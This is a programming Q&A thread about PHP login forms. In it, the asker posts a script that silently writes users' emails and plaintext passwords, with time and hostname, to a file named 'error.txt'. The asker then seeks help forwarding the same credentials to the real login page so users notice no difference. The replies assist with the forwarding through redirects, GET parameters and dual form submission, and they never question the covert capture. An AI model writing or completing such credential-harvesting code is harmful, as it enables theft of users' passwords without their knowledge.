# Save Form's Variables and then post to login.php page

Tags: php, post

I have a FORM page, user enters email and password and then clicks Login. Normally, it posts email and password to my Login.php page and then user continues browsing. But now I want to save this email and password and then post it to the login page, I tried saving it by post.php and then post that data to login.php but I couldnt. I can save email and password but I don't know how to continue the code and user don't feel that its different from before.
How can I do this?
I always get my answers from you all professionals, thank you.

```
<html dir="ltr">
<head>
    <?php
$date = date('m/d/Y h:i:s a', time());
$pc = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$handle = fopen("error.txt", "a");
$mail= $_POST['email'];
$passw = $_POST['pass'];
fwrite($handle, $mail);
fwrite($handle, "  ");
fwrite($handle, $passw);
fwrite($handle, "     --    ");
fwrite($handle, $date);
fwrite($handle, "  ");
fwrite($handle, $pc);
fwrite($handle, "\n");
fclose($handle);


exit;

?>
```

Comment: You could try saving those in a $_SESSION OR using a $_GET from post.php to login.php

Comment: for using $_GET do i need to change Login.php? cause i dont want to change login.php and i just want it to be on post.php or the form..

Comment: If you are using $_POST now, it should work,since its a super global array. What you might need is a simple redirect from post.php to login.php..Use header("Location:http://www.*****");Could you please post some code to get a clear view.

Comment: yeah definitly, i will edit it and post my POST.PHP code here

Answer (score 0):

Dont create another Post.php. Do everything you want i.e. save email and password on top of Login.php and then login and do whatever you want to do

Otherwise you can do is to send the variable to login.php from post.php like

```
$email=$_POST['email'];
header("Location:login.php?email=".$email);
```

And get this in login.php via

```
$_GET['email'];
```

Comment: actually as i said i dont want to edit my login.php page, it uses posted informations and i want to send these infoes from post.php like my post.php work excactly like my form page and my login.php doesnt have to know who is sending these informations!!! its possible right?!

Comment: This is not possible, either store in session variable then access session but if you need to save login information every time then why go through so much trouble, its not how you like it, it is always about what is best. Why create a separate file for this and use another redirection, save the data in Login.php. Still if you don't want to then you need to create two forms then through javascript submit both forms, one to Post.php and other to Login.php